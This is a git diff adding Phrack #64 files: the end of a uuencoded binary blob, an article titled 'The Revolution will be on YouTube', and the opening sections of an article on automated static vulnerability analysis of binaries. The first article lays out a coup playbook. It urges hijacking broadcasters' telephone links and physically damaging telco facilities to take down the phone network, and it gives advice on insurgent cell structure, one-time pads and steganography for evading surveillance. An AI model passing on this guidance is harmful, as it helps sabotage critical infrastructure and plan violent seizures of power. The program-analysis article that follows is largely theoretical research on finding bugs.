+MV??OW%/+Y%]OR&D*I+9<)=Q;<1/FXB2MM5%CJBXA2&UM^6)DT*I45Z^@5GR;
+M:$C-$I)2-=J_,&UB(U6SQ7(:9I.`D*/-<JB',N;2#^9^/$MX4.[(4>"I(?=!
+M3@M*655E5?K(,#BGY],]IPZ9G$N/Y3;2]A8+="]&1C@1&^08UE18K0(9Z/W[
+M@$S<O/DB9F,EE`2U$8]=C*=G>GT&\-,+Q0LI4P`>:>W.R;*NLVBN*8W\=K7L
+MD>[8(8JJAET8M8YF)",^NI6TD0:0YX-1#8"$G<,!>S'D:OC(@X`ES&C9L%8S
+MAM&4$PN6D&AGRHB+<G)D4/<:O=8*419:S9^ZSH""$QL:5%.V".H>`M`&X[@B
+M,9J'`)CA%#:"=64.Y#UCNY$I61U<HGIM6A<'(V3%_"W&C[-Y-/`&L()-0!J7
+MMG\WP4O@ZH/P`@VU,.(#F8F(DCSPJ-&:BF><NK2IB4*CNN!E3$>@"Z(Q,M8"
+M0BV.PEMHIU@G,T36?1,U#@(T_4+#K#%:1-R)Z,J[,PSI@.DN,31U>,O6R=@_
+MX+].,F&)<'C2,MZY*9H&R*<=&683/TNENT3J:]',;!?N(8FGT`0=[OV:8:_5
+MT@//?]7%*1CJPP#UA8@FP-P83:D!FQ?AE&=R>MYIN?XWF0'6AL?:(F4W/\Z3
+M\6%TOJ`VCR5UFR:[)08HO$4.+$T-.ZVP^DA&3F!Y\H3.O!-58'*I[3`0;^6)
+M^QLZ*/YN[[NC_K?\,--UL&OHC!K0UB`>WC`.<.3+B_R7#T9PU/G"1:F1VJ4J
+M&(GAW^!E@J!JS,*8C9RWUT4)>HIWSI4%(^JR<;I7$VY`BP'9,M*V;GY7QEA4
+M<M/Z>]_&>'Z>G^?G^7E^GI_GY_EY?IZ?Y^?Y>7Z>G^?G^7E^GI_GY_EY?IZ?
+HY^?Y>7Z>G^?G^7E^GI_GY_EY?IZ?Y^?Y>7Z>G\<]_Q=OV)(^``@"````
+`
+end
diff --git a/phrack64/7.txt b/phrack64/7.txt
new file mode 100644
index 0000000..d256d6f
--- /dev/null
+++ b/phrack64/7.txt
@@ -0,0 +1,160 @@
+              _                                                _
+            _/B\_                                            _/W\_
+            (* *)             Phrack #64 file 7              (* *)
+            | - |                                            | - |
+            |   |     The Revolution will be on YouTube      |   |
+            |   |                                            |   |
+            |   |                 By Gladio                  |   |
+            |   |                                            |   |
+            |   |              Gladio@phrack.org             |   |
+            (____________________________________________________)
+
+
+Forget everything you know about revolutions. It's all wrong.
+
+Fighting a conventional war in an industrialized nation is suicide. Even
+if you could field a military force capable of defeating the government
+forces, the wreckage wouldn't be worth having. Think about mortar shells
+landing in chemical plants. Massive toxic waste spills. Poisonous clouds
+drifting with the winds. Fighting a war in your own backyard is just
+plain stupid. Notice how the super-powers fight each other with proxy
+wars in other countries.
+
+Sure it might be fun to form a militia and go play army with your friends
+in Idaho. Got some full-auto assault rifles?  Maybe even mortars, heavy
+machine guns and some anti-aircraft guns?
+
+Think they can take out an AC-130 lobbing artillery shells from 12 miles
+away? A flight of A-10s spitting depleted uranium shells the size of your
+fist at a rate that makes the cannon sound like a redlined dirt bike? A
+shooting war with a modern government is a shortcut to obliteration.
+
+Most coups are accomplished (or thwarted) by skillful manipulation of
+information. There have been a number of countries where tyrants (and
+legitimate leaders) have been overthrown by very small groups using mass
+communications effectively.
+
+The typical method involves blocking all (or most) information sources
+controlled by the government, and supplying an alternative that delivers
+your message. Usually, you just announce the change in government, tell
+everyone they are safe and impose a curfew for a short time to consolidate
+your control. Announce that the country, the police and the military are
+under your control, and keep repeating it. Saturate the airwaves with your
+message, while preventing any contradictory messages from propagation.
+
+Virtually all broadcast media use the telephone network to deliver content
+from their studios to their transmitters.  Networks use satellites and
+pstn to distribute content to local stations, which then use pstn to
+deliver it to the transmitter site.
+
+Hijacking these phone connections accomplishes both goals, of denying the
+'official' media access, and putting your own message out.
+
+In cases where you can't hijack the transmitters, dropping the pstn
+will be effective. Police and military also use pstn to connect dispatch
+centers with transmitter towers. Recently, many have installed wireless
+(microwave) fallback systems.
+
+Physically shutting down the pstn just prior to your broadcasts may be
+very effective. This is most easily accomplished by physical damage to
+the telco facilities, but there are also non-physical technical means to
+do this on a broad scale.  Spelling them out here would only result in the
+holes being closed, but if you have people with the skill set to do this,
+it is preferable to physical means because you will have the advantage
+of utilizing these communications resources as your plan progresses.
+
+
+Leveraging the Internet
+
+Most of the FUD produced about insurgence and the internet is focused on
+"taking down" the internet. That's probably not the most effective use
+of technical assets. An insurgency would benefit more from utilizing the
+net. One use is mass communications. Get your message out to the masses
+and recruit new members.
+
+Another use is for communications within your group. This is where things
+get sticky. Most governments have the ability to monitor and intercept
+their citizen's internet traffic. The governments most deserving of
+being overthrown are probably also the most effective at electronic
+surveillance.
+
+The gov will also infiltrate your group, so forums aren't going to
+be the best means of communicating strategies and tactics. Forums can
+be useful for broad discussions, such as mission statements, goals and
+recruiting. Be wary of traffic analysis and sniffing. TOR can be useful,
+particularly if your server is accessible only on TOR network.
+
+Encryption is your best friend, but can also be your worst enemy. Keep
+in mind that encryption only buys you time. A good, solid cipher will
+not likely be read in real time by your opponent, but will eventually
+be cracked. The important factor here is that it not be cracked until
+it's too late to be useful.
+
+A one time pad (OTP) is the best way to go. Generate random data and
+write it to 2, and only 2, DVDs. Physically transport the DVDs to each
+communications endpoint. Never let them out of your direct control. Do
+not mail them. Do not send keys over ssh or ssl. Physically hand the DVD
+to your counterpart on the other end. Never re-use a portion of the key.
+
+Below is a good way to utilize your OTP:
+
+Generate a good OTP (K), come up with a suspicious alternate message
+(M), and knowing your secret text (P), you calculate (where "+" = mod
+26 addition):
+
+K' = M + K 
+K'' = P + K 
+C = K' + P
+
+Lock up K'' in a safety deposit box, and hide k' in some other off
+site, secure location. Keep C around with big "beware of Crypto systems"
+signs. When the rubber hose is broken out, take at least 2 good lickings,
+and then give up the key to the safety deposit box. They get K'',
+and calculate
+
+K'' + C = M
+
+thus giving them the bogus message, and protecting your real text.
+
+
+Operational Security
+
+The classic "cellular" configuration is the most secure against
+infiltration and compromise. A typical cell should have no more than 5-10
+members. One leader, 2 members who each know how to contact one member
+of an 'upstream' cell, and 2 members who each know how to contact one
+member of a downstream cell. Nobody, including the leader, should know
+how to contact more than one person outside of their own cell.
+
+Never use your real name, and never use your organizational alias in
+any other context.
+
+Electronic communications between members should be kept to a
+minimum. When it is necessary, it should only be conducted via the OTP
+cipher. Preferably, these communications should consist of not much more
+than arranging a physical meeting.  Meet at a pre-arranged place, and
+then go to another, un-announced place where surveillance is difficult,
+to discuss operational matters.
+
+Do not carry a phone. Even a phone which is switched off can be
+tracked, and most can be used to eavesdrop on discussions even when
+powered down. Removing the battery is only marginally safer, because
+tracking/listening gear can be built into the battery pack. If you find
+yourself stuck with a phone during a meeting, remove the battery and
+place both the phone and battery in a metal box and remove it from the
+immediate area of conversation.
+
+It never hurts to generate some bogus traffic. Gibberish, random data,
+innocuous stories etc., all serve to generate noise in which to better
+hide your real communications.
+
+Steganography can be useful when combined with solid crypto. Encrypt and
+stego small messages into something like a full length movie avi, and
+distribute it to many people via a torrent. Only your intended recipient
+will have the key to decrypt the stegged message. Be sure to stego some
+purely random noise into other movies, and torrent them as well.
+
+Hopefully you'll find this document useful as a starting point for
+further discussion and refinement. It's not meant to be definitive, and
+is surely not comprehensive. Feel free to copy, add, edit or change as
+you see fit. Please do add more relative to your area(s) of expertise.
diff --git a/phrack64/8.txt b/phrack64/8.txt
new file mode 100644
index 0000000..312dbfe
--- /dev/null
+++ b/phrack64/8.txt
@@ -0,0 +1,1986 @@
+		  Automated vulnerability auditing in machine code
+
+             		Tyler Durden <tyler@phrack.org> 
+
+		              Phrack Magazine #64
+                  		
+		             Version of May 22 2007
+
+					
+
+I. Introduction
+   a/ On the need of auditing automatically
+   b/ What are exploitation frameworks
+   c/ Why this is not an exploitation framework
+   d/ Why this is not fuzzing
+   e/ Machine code auditing : really harder than sources ? 
+
+II. Preparation
+   a/ A first intuition 
+   b/ Static analysis vs dynamic analysis
+   c/ Dependences & predicates
+       - Controlflow analysis
+       - Dataflow analysis
+   d/ Translation to intermediate forms
+   e/ Induction variables (variables in loops)     
+
+III. Analysis
+   a/ What is a vulnerability ?
+   b/ Buffer overflows and numerical intervals
+	- Flow-insensitive
+	- Flow-sensitive
+	- Accelerating the analysis by widening
+   c/ Type-state checking
+	- Memory leaks
+	- Heap corruptions	
+   d/ More problems
+	- Predicate analysis
+	- Alias analysis and naive solutions
+	- Hints on detecting race conditions
+
+IV. Chevarista: an analyzer of binary programs
+   a/ Project modelization
+   b/ Program transformation
+   c/ Vulnerability checking
+   d/ Vulnerable paths extraction
+   e/ Future work : Refinement
+
+V. Related Work
+   a/ Model Checking
+   b/ Abstract Interpretation
+
+VI. Conclusion
+VII. Greetings
+VIII. References
+IX. The code
+      
+
+	.::###########################################################::.
+
+
+Software have bugs. That is quite a known fact.
+
+
+
+----------------------[ I. Introduction
+
+
+
+In this article, we will discuss the design of an engine for automated 
+vulnerability analysis of binary programs. The source code of the 
+Chevarista static analyzer is given at the end of this document.
+
+The purpose of this paper is not to disclose 0day vulnerability, but
+to understand how it is possible to find them without (or with
+restricted) human intervention. However, we will not friendly provide
+the result of our automated auditing on predefined binaries : instead
+we will always take generic examples of the most common difficulties 
+encountered when auditing such programs. Our goal is to enlight the 
+underground community about writing your own static analyzer and not
+to be profitful for security companies or any profit oriented organization.
+
+Instead of going straight to the results of the proposed implementation, 
+we may introduce the domain of program analysis, without going deeply
+in the theory (which can go very formal), but taking the perspective
+of a hacker who is tired of focusing on a specific exploit problem
+and want to investigate until which automatic extend it is possible
+to find vulnerabilities and generate an exploit code for it without
+human intervention.
+
+Chevarista hasnt reached its goal of being this completely automated
+tool, however it shows the path to implement incrementally such tool
+with a genericity that makes it capable of finding any definable kind 
+of vulnerability.
+
+Detecting all the vulnerabilities of a given program can be
+untractable, and this for many reasons. The first reason is that
+we cannot predict that a program running forever will ever have
+a bug or not. The second reason is that if this program ever stop,
+the number of states (as in "memory contexts") it reached and passed
+through before stopping is very big, and testing all of of possible
+concrete program paths would either take your whole life, or a dedicated 
+big cluster of machine working on this for you during ages.
+
+As we need more automated systems to find bugs for us, and we do not
+have such computational power, we need to be clever on what has to be 
+analysed, how generic can we reason about programs, so a single small 
+analyzer can reason about a lot of different kinds of bugs. After all, 
+if the effort is not worth the genericity, its probably better to audit 
+code manually which would be more productive. However, automated systems
+are not limited to vulnerability findings, but because of their tight 
+relation with the analyzed program, they can find the exact conditions 
+in which that bug happens, and what is the context to reach for triggering it.
+
+But someone could interject me : "But is not Fuzzing supposed to do
+that already ?". My answer would be : Yes. But static analysis is
+the intelligence inside Fuzzing. Fuzzy testing programs give very
+good results but any good fuzzer need to be designed with major static
+analysis orientations. This article also applies somewhat to fuzzing
+but the proposed implementation of the Chevarista analyzer is not 
+a fuzzer. The first reason is that Chevarista does not execute the
+program for analyzing it. Instead, it acts like a (de)compiler but 
+perform analysis instead of translating (back) to assembly (or source) code.
+It is thus much more performant than fuzzing but require a lot of
+development and litterature review for managing to have a complete
+automatic tool that every hacker dream to maintain.
+
+Another lost guy will support : "Your stuff looks more or less like an
+exploitation framework, its not so new". Exploitation frameworks
+are indeed not very new stuffs. None of them analyze for vulnerabilities,
+and actually only works if the builtin exploits are good enough. When
+the framework aims at letting you trigger exploits manually, then it
+is not an automated framework anymore. This is why Chevarista is not
+CORE-Impact or Metasploit : its an analyzer that find bugs in programs
+and tell you where they are.
+
+One more fat guy in the end of the room will be threatening: "It is simply
+not possible to find vulnerabilities in code without the source .." and
+then a lot of people will stand up and declare this as a prophety, 
+because its already sufficiently hard to do it on source code anyway.
+I would simply measure this judgement by several remarks: for some
+peoples, assembly code -is- source code, thus having the assembly is
+like having the source, without a certain number of information. That
+is this amount of lost information that we need to recover when writing
+a decompiler. 
+
+First, we do not have the name of variables, but naming variables in a different
+way does not affect the result of a vulnerability analysis. Second, we do not have
+the types, but data types in compiled C programs do not really enforce properties 
+about the variables values (because of C casts or a compiler lacking strong type 
+checking). The only real information that is enforced is about variable size in
+memory, which is recoverable from an assembly program most of the time. This
+is not as true for C++ programs (or other programs written in higher level
+objects-oriented or functional languages), but in this article we will 
+mostly focuss on compiled C programs.
+
+A widely spread opinion about program analysis is that its harder to 
+acheive on a low-level (imperative) language rather than a high-level 
+(imperative) language. This is true and false, we need to bring more 
+precision about this statement. Specifically, we want to compare the
+analysis of C code and the analysis of assembly code:
+
+
+ ---------------------------------------------------------------------
+| Available information   |      C code         |    Assembly code    |
+|---------------------------------------------------------------------|
+| Original variables names|    Yes (explicit)   |         No          |
+|---------------------------------------------------------------------|
+|   Original types names  |    Yes (explicit)   |         No          |
+|---------------------------------------------------------------------|
+|  Control Sequentiality  |    Yes (explicit)   |    Yes (explicit)   |
+|---------------------------------------------------------------------|
+|  Structured control     |    Yes (explicit)   |    Yes (recoverable)|
+|---------------------------------------------------------------------|
+|    Data dependencies    |    Yes (implicit)   |    Yes (implicit)   |
+|---------------------------------------------------------------------|
+|    Data Types           |    Yes (explicit)   |    Yes (recoverable)|
+|---------------------------------------------------------------------|
+|    Register transfers   |    No               |    Yes (explicit)   |
+|---------------------------------------------------------------------|
+|  Selected instructions  |    No               |    Yes (explicit)   |
+ ---------------------------------------------------------------------
+
+Lets discuss those points more in details:
+
+ - The control sequentiality is obviously kept in the assembly, else
+the processor would not know how to execute the binary program.
+However the binary program does not contain a clearly structured
+tree of execution. Conditionals, but especially, Loops, do not appear
+as such in the executable code. We need a preliminary analysis for
+structuring the control flow graph. This was done already on source
+and binary code using different algorithms that we do not present
+in this article.
+
+- Data dependencies are not explicit even in the source program, however
+we can compute it precisely both in the source code and the binary code.
+The dataflow analysis in the binary code however is slightly different,
+because it contains every single load and store between registers and
+the memory, not only at the level of variables, as done in the source
+program. Because of this, the assembly programs contains more instructions
+than source programs contain statements. This is an advantage and a
+disadvantage at the same time. It is an advantage because we can track
+the flow in a much more fine-grained fashion at the machine level, and
+that is what is necessary especially for all kind of optimizations, 
+or machine-specific bugs that relies on a certain variable being either
+in the memory or in a register, etc. This is a disadvantage because we 
+need more memory to analyse such bigger program listings.
+
+- Data types are explicit in the source program. Probably the recovery
+of types is the hardest information to recover from a binary code. 
+However this has been done already and the approach we present in this
+paper is definitely compatible with existing work on type-based
+decompilation. Data types are much harder to recover when dealing with
+real objects (like classes in compiled C++ programs). We will not deal
+with the problem of recovering object classes in this article, as we 
+focuss on memory related vulnerabilities.
+
+- Register level anomalies can happen [DLB], which can be useful for a 
+hacker to determine how to create a context of registers or memory when 
+writing exploits. Binary-level code analysis has this advantage that it 
+provides a tighter approach to exploit generation on real world existing 
+targets.
+
+- Instruction level information is interested again to make sure we dont
+miss bugs from the compiler itself. Its very academically well respected
+to code a certified compiler which prove the semantic equivalence between
+source code and compiled code but for the hacker point of view, it does 
+not mean so much. Concrete use in the wild means concrete code,
+means assembly. Additionally, it is rarer but it has been witnessed
+already some irregularities in the processor's execution of specific
+patterns of instructions, so an instruction level analyzer can deal with
+those, but a source level analyzer cannot. A last reason I would mention
+is that the source code of a project is very verbose. If a code analyzer
+is embedded into some important device, either the source code of the
+software inside the device will not be available, or the device will lack
+storage or communication bandwidth to keep an accessible copy of the source
+code. Binary code analyzer do not have this dependencie on source code and
+can thus be used in a wider scope.
+
+
+To sum-up, there is a lot of information recovery work before starting to
+perform the source-like level analysis. However, the only information
+that is not available after recovery is not mandatory for analysing
+code : the name of types and variables is not affecting the 
+execution of a program. We will abstract those away from our analysis
+and use our own naming scheme, as presented in the next chapter of this 
+article.
+
+
+
+
+-------------[ II. Preparation
+
+
+
+
+We have to go on the first wishes and try to understand better what
+vulnerabilities are, how we can detect them automatically, are we
+really capable to generate exploits from analyzing a program that we
+do not even execute ? The answer is yes and no and we need to make 
+things clear about this. The answer is yes, because if you know exactly
+how to caracterize a bug, and if this bug is detectable by any 
+algorithm, then we can code a program that will reason only about
+those known-in-advance vulnerability specificities and convert the 
+raw assembly (or source) code into an intermediate form that will make
+clear where the specificities happens, so that the "signature" of the
+vulnerability can be found if it is present in the program. The answer
+is no, because giving an unknown vulnerability, we do not know in
+advance about its specificities that caracterize its signature. It
+means that we somewhat have to take an approximative signature and 
+check the program, but the result might be an over-approximation (a
+lot of false positives) or an under-approximation (finds nothing or
+few but vulnerabilities exist without being detected).
+
+As fuzzing and black-box testing are dynamic analysis, the core of 
+our analyzer is not as such, but it can find an interest to run the 
+program for a different purpose than a fuzzer. Those try their 
+chance on a randomly crafted input. Fuzzer does not have a *inner*
+knowledge of the program they analyze. This is a major issue because
+the dynamic analyzer that is a fuzzer cannot optimize or refine
+its inputs depending on what are unobservable events for him. A fuzzer
+can as well be coupled with a tracer [AD] or a debugger, so that fuzzing 
+is guided by the debugger knowledge about internal memory states and 
+variable values during the execution of the program.
+
+Nevertheless, the real concept of a code analysis tool must be an integrated 
+solution, to avoid losing even more performance when using an external 
+debugger (like gdb which is awfully slow when using ptrace). Our 
+technique of analysis is capable of taking decisions depending on 
+internal states of a program even without executing them. However, our 
+representation of a state is abstract : we do not compute the whole 
+content of the real memory state at each step of execution, but consider
+only the meaningful information about the behavior of the program by automatically 
+letting the analyzer to annotate the code with qualifiers such as : "The next 
+instruction of the will perform a memory allocation" or "Register R or memory cell 
+M will contain a pointer on a dynamically allocated memory region". We will explain
+in more details heap related properties checking in the type-state analysis
+paragraph of Part III.
+
+In this part of the paper, we will describe a family of intermediate forms
+which bridge the gap between code analysis on a structured code, and code
+analysis on an unstructured (assembly) code. Conversion to those intermediate
+forms can be done from binary code (like in an analyzing decompiler) or from
+source code (like in an analyzing compiler). In this article, we will
+transform binary code into a program written in an intermediate form, and then
+perform all the analysis on this intermediate form. All the studies properties
+will be related to dataflow analysis. No structured control flow is necessary
+to perform those, a simple control flow graph (or even list of basic blocks
+with xrefs) can be the starting point of such analysis.
+
+Lets be more  concrete a illustrate how we can analyze the internal states of
+a program without executing it. We start with a very basic piece of code:
+
+	
+Stub 1:
+-------
+			 o			o  : internal state
+ if (a)		        / \		
+   b++;		->     o   o			/\ : control-flow splitting 
+ else		        \ /			\/ : control-flow merging
+   c--;	               	 o
+-------                        
+
+
+In this simplistic example, we represent the program as a graph whoose
+nodes are states and edges are control flow dependencies. What is an internal
+state ? If we want to use all the information of each line of code,	
+we need to make it an object remembering which variables are used and modified 
+(including status flags of the processors). Then, each of those control state
+perform certains operations before jumping on another part of the code (represented
+by the internal state for the if() or else() code stubs). Once the if/else 
+code is finished, both paths merge into a unique state, which is the state after
+having executed the conditional statement. Depending how abstract is the analysis,
+the internal program states will track more or less requested information at each
+computation step. For example, once must differentiate a control-flow analysis 
+(like in the previous example), and a dataflow analysis.
+
+Imagine this piece of code:
+
+
+Stub 2:
+-------
+
+Code			Control-flow		  Data-flow with predicates
+
+                                                           a
+						        ---o--- 
+                                                       /    \  \
+                                                      /      \  \
+						     /  c     \  \
+c = 21;			    o		            |   o    b o  \
+b = a;			    |			    |  / \    /    \ 
+a = 42;			    o			     \/   ------   /
+if (b != c)		   / \		             /\  |b != c| /  
+  a++;			  o   o  		    /  \  ------ /
+else			   \ /                     /    \ /   \ /
+  a--;                      o                     |    a o   a o
+c += a;                     |                      \     |    /
+-------                     o                       \    |   /
+			                             \   |  /
+						      \	 | / 
+                                                       c o 	
+                                                         |
+						       (...)
+                            
+
+In a dataflow  graph, the nodes are the variables, and the arrow are the
+dependences between variables. The control-flow and data-flow graphs are
+actually complementary informations. One only cares about the sequentiality
+in the graph, the other one care about the dependences between the variables
+without apparently enforcing any order of evaluation. Adding predicates
+to a dataflow graph helps at determining which nodes are involved in a
+condition and which instance of the successors data nodes (in our case, 
+variable a in the if() or the else()) should be considered for our 
+analysis.
+
+As you can see, even a simple data-flow graph with only few variables
+starts to get messy already. To clarify the reprensentation of the 
+program we are working on, we need some kind of intermediate representation
+that keep the sequentiality of the control-flow graph, but also provide the
+dependences of the data-flow graph, so we can reason on both of them
+using a single structure. We can use some kind of "program dependence graph"
+that would sum it up both in a single graph. That is the graph we will consider
+for the next examples of the article.
+
+Some intermediate forms introduces special nodes in the data-flow graph, and
+give a well-recognizable types to those nodes. This is the case of Phi() and
+Sigma() nodes in the Static Single Assignment [SSA] and Static Single 
+Information [SSI] intermediate forms and that facilitates indeed the reasoning
+on the data-flow graph. Additionally, decomposing a single variable into
+multiple "single assignments" (and multiple single use too, in the SSI form),
+that is naming uniquely each apparition of a given variable, help at desambiguizing 
+which instance of the variable we are talking about at a given point of the program:
+
+
+
+Stub 2 in SSA form	Stub 2 in SSI form	Data-flow graph in SSI form
+------------------	------------------	--------------------------
+
+c1 = 21;		c1 = 21;			              o a1
+b1 = a1;		b1 = a1;			             / \
+if (b1 != c1)		(a3, a4) = Sigma(a2);  (a3, a4) = Sigma(a2) o   o b1
+  a2 = a1 + 1;		if (b1 != c1)                              /|
+else			  a3 = a2 + 1;                            / |
+                                                                 /  | 
+                                                                /   |    
+                                                               /    |    o c1
+  a3 = a1 - 1;		else                                   |    |    |
+a4 = Phi(a2, a3)	  a4 = a2 - 1;                      a3 o    o a4 |
+c2 = c1 + a4;		a5 = Phi(a3, a4);                       \   |    |
+			c2 = c1 + a5;                            \  |    |
+----------------        -------------------                       \ |    |
+                                                                   \|    |
+                                                  a5 = Phi(a3, a4)  o    |
+                                                                     \  /
+                                                                      o c2
+                                                                      .
+                                                                      .
+                                                                      .
+
+      
+Note that we have not put the predicates (condition test) in that graph. In
+practice, its more convenient to have additional links in the graph, for 
+predicates (that ease the testing of the predicate when walking on the graph),
+but we have removed it just for clarifying what is SSA/SSI about.
+
+Those "symbolic-choice functions" Phi() and Sigma() might sound a little bit
+abstract. Indeed, they dont change the meaning of a program, but they capture
+the information that a given data node has multiple successors (Sigma) or
+ancestors (Phi). The curious reader is invited to look at the references for
+more details about how to perform the intermediate translation. We will here 
+focuss on the use of such representation, especially when analyzing code 
+with loops, like this one:
+
+
+		Stub 3 C code		Stub 3 in Labelled SSI form        
+		-------------           ---------------------------       
+
+		int a = 42;	        int a1 = 42;
+		int i = 0;              int i1 = 0;
+
+					P1 = [i1 < a1]
+                        		(<i4:Loop>, <i9:End>) = Sigma(P1,i2);
+					(<a4:Loop>, <a9:End>) = Sigma(P1,a2);
+			
+		while (i < a)           
+		{                 =>    Loop:
+                       			 a3 = Phi(<BLoop:a1>, <BEnd:a5>);
+					 i3 = Phi(<BLoop:i1>, <BEnd:i5>);
+  		  a--;                   a5 = a4 - 1;
+  		  i++;                   i5 = i4 + 1;
+					 P2 = [i5 < a5]
+					 (<a4:Loop>, <a9:End>) = Sigma(P2,a6);
+		        		 (<i4:Loop>, <i9:End>) = Sigma(P2,i6);
+		} 
+                        		End:
+                        		 a8 = Phi(<BLoop:a1>, <Bend:a5>);
+                        		 i8 = Phi(<BLoop:i1>, <Bend:i5>);
+		a += i;                  a10 = a9 + i9;
+		-----------             ---------------------------------
+
+
+
+By trying to synthetize this form a bit more (grouping the variables
+under a unique Phi() or Sigma() at merge or split points of the control
+flow graph), we obtain a smaller but identical program. This time,
+the Sigma and Phi functions do not take a single variable list in parameter,
+but a vector of list (one list per variable):
+
+
+		Stub 3 in Factored & Labelled SSI form        
+		--------------------------------------
+
+		int a1 = 42;
+		int i1 = 0;
+
+		P1 = [i1 < a1]
+
+		(<i4:Loop>, <i9:End>)            (i2)
+		(		    ) = Sigma(P1,(  ));
+		(<a4:Loop>, <a9:End>)            (a2)
+	   
+			
+		Loop:
+
+		(a3)      (<BLoop:a1>, <BEnd:a5>)
+		(  ) = Phi(                     );
+		(i3)      (<BLoop:i1>, <BEnd:i5>)
+
+		a5 = a4 - 1;
+		i5 = i4 + 1;
+
+		P2 = [i5 < a5]
+
+		(<a4:Loop>, <a9:End>)             (a6)
+		(                   ) = Sigma(P2, (  ));
+		(<i4:Loop>, <i9:End>)             (i6)
+
+		End:
+
+		(a8)      (<BLoop:a1>, <Bend:a5>)
+		(  ) = Phi(                     );
+		(i8)      (<BLoop:i1>, <Bend:i5>)
+
+		a10 = a9 + i9;
+		----------------------------------------
+
+
+
+How can we add information to this intermediate form ? Now the Phi()
+and Sigma() functions allows us to reason about forward dataflow
+(in the normal execution order, using Sigma) and backward dataflow 
+analysis (in the reverse order, using Phi). We can easily find the
+inductive variables (variables that depends on themselves, like the
+index or incrementing pointers in a loop), just using a simple analysis:
+
+Lets consider the Sigma() before each Label, and try to iterate its 
+arguments:
+
+
+		
+		(<a4:Loop>, <a9:End>)             (a6)
+		(                   ) = Sigma(P2, (  ));
+		(<i4:Loop>, <i9:End>)             (i6)
+		
+
+	->	(<a5:Loop>,<a10:End>)
+		(                   )
+		(<i5:Loop>,   _|_   )
+
+
+	->      (<a6:Loop>,   _|_   )
+		(                   )
+		(<i6:Loop>,   _|_   )
+
+
+
+We take _|_ ("bottom") as a notation to say that a variable
+does not have any more successors after a certain iteration
+of the Sigma() function.
+
+After some iterations (in that example, 2), we notice that 
+the left-hand side and the right-hand side are identical 
+for variables a and i. Indeed, both side are written given
+a6 and i6. In the mathematical jargon, that is what is called
+a fixpoint (of a function F) : 
+
+	F(X) = X
+
+or in this precise example:
+
+	a6 = Sigma(a6)
+
+By doing that simple iteration-based analysis over our 
+symbolic functions, we are capable to deduce in an automated
+way which variables are inductives in loops. In our example,
+both a and i are inductive. This is very useful as you can imagine, 
+since those variables become of special interest for us, especially 
+when looking for  buffer overflows that might happen on buffers in 
+looping code.
+
+We will now somewhat specialize this analysis in the following
+part of this article, by showing how this representation can
+apply to
+
+
+
+-------------------[ III. Analysis
+
+
+
+	The previous part of the article introduced various notions
+in program analysis. We might not use all the formalism in the future
+of this article, and focuss on concrete examples. However, keep in
+mind that we reason from now for analysis on the intermediate form
+programs. This intermediate form is suitable for both source code
+and binary code, but we will keep on staying at binary level for our
+examples, proposing the translation to C only for understanding
+purposes. Until now, we have shown our to understand data-flow analysis
+and finding inductive variables from the (source or binary) code of 
+the program. 
+
+So what are the steps to find vulnerabilities now ?
+
+A first intuition is that there is no generic definition for a 
+vulnerability. But if we can describes them as behavior that 
+violates a certain precise property, we are able to state if a 
+program has a vulnerability or not. Generally, the property depends
+on the class of bugs you want to analyse. For instance, properties 
+that express buffer overflow safety or property that express a heap 
+corruption (say, a double free) are different ones. In the first case, 
+we talk about the indexation of a certain memory zone which has to never
+go further the limit of the allocated memory. Additionally, for
+having an overflow, this must be a write access. In case we have a
+read access, we could refer this as an info-leak bug, which 
+may be blindly or unblindly used by an attacker, depending if the
+result of the memory read can be inspected from outside the process
+or not. Sometimes a read-only out of bound access can also be used
+to access a part of the code that is not supposed to be executed
+in such context (if the out-of-bound access is used in a predicate).
+In all cases, its interesting anyway to get the information by our 
+analyzer of this unsupposed behavior, because this might lead to a 
+wrong behavior, and thus, a bug.
+
+In this part of the article, we will look at different class of
+bugs, and understand how we can caracterize them, by running very
+simple and repetitive, easy to implement, algorithm. This algorithm
+is simple only because we act on an intermediate form that already
+indicates the meaningful dataflow and controlflow facts of the
+program. Additionally, we will reason either forward or backward,
+depending on what is the most adapted to the vulnerability.
+
+We will start by an example of numerical interval analysis and show
+how it can be useful to detect buffer overflows. We will then show
+how the dataflow graph without any value information can be useful
+for finding problems happening on the heap. We will enrich our 
+presentation by describing a very classic problem in program analysis,
+which is  the discovery of equivalence between pointers (do they point
+always on the same variable ? sometimes only ? never ?), also known as
+alias analysis. We will explain why this analysis is mandatory for any
+serious analyzer that acts on real-world programs. Finally, we will
+give some more hints about analyzing concurrency properties inside
+multithread code, trying to caracterize what is a race condition.
+
+
+
+------------[ A. Numerical intervals
+
+
+
+
+	When looking for buffer overflows or integer overflows, the 
+mattering information is about the values that can be taken by 
+memory indexes or integer variables, which is a numerical value.
+
+Obviously, it would not be serious to compute every single possible
+value for all variables of the program, at each program path : this
+would take too much time to compute and/or too much memory for the values
+graph to get mapped entirely.
+
+By using certain abstractions like intervals, we can represent the set
+of all possible values of a program a certain point of the program. We
+will illustrate this by an example right now. The example itself is
+meaningless, but the interesting point is to understand the mecanized
+way of deducing information using the dataflow information of the program
+graph.
+
+
+We need to start by a very introductionary example, which consists of
+finding
+
+
+Stub 4					Interval analysis of stub 4
+-------					---------------------------
+
+int  a, b;	
+
+b = 0;					b = [0 to 0]
+if (rand())		 
+ b--;					b = [-1 to -1]
+else
+ b++;					b = [1 to 1]
+
+					After if/else:
+
+					b = [-1 to 1]
+
+a = 1000000 / b;			a = [1000000 / -1 to 1000000 / 1] 
+					    [Reported Error: b can be 0]
+
+
+In this example, a flow-insensitive analyzer will merge the interval of values
+at each program control flow merge. This is a seducing approach as you need to
+pass a single time on the whole program to compute all intervals. However, this
+approach is untractable most of the time. Why ? In this simple example, the
+flow-insensitive analyzer will report a bug of potential division by 0, whereas
+it is untrue that b can reach the value 0 at the division program point. This
+is because 0 is in the interval [-1 to 1] that this false positive is reported
+by the analyzer. How can we avoid this kind of over-conservative analysis ?
+
+We need to introduce some flow-sensitiveness to the analysis, and differentiate
+the interval for different program path of the program. If we do a complete flow 
+sensitive analysis of this example, we have:
+
+
+Stub 4					Interval analysis of stub 4
+-------					---------------------------
+
+int  a, b;	
+
+b = 0;					b = [0 to 0]
+if (rand())		 
+ b--;					b = [-1 to -1]
+else
+ b++;					b = [1 to 1]
+
+					After if/else:
+
+					b = [-1 to -1 OR 1 to 1]
+
+a = 1000000 / b;			a = [1000000 / -1 to 1000000 / -1] or 
+					    [1000000 /  1 to 1000000 /  1] 
+					  = {-1000000 or 1000000}
+
+
+Then the false positive disapears. We may take care of avoiding to be flow sensitive
+from the beginning. Indeed, if the flow-insensitive analysis gives no bug, then no
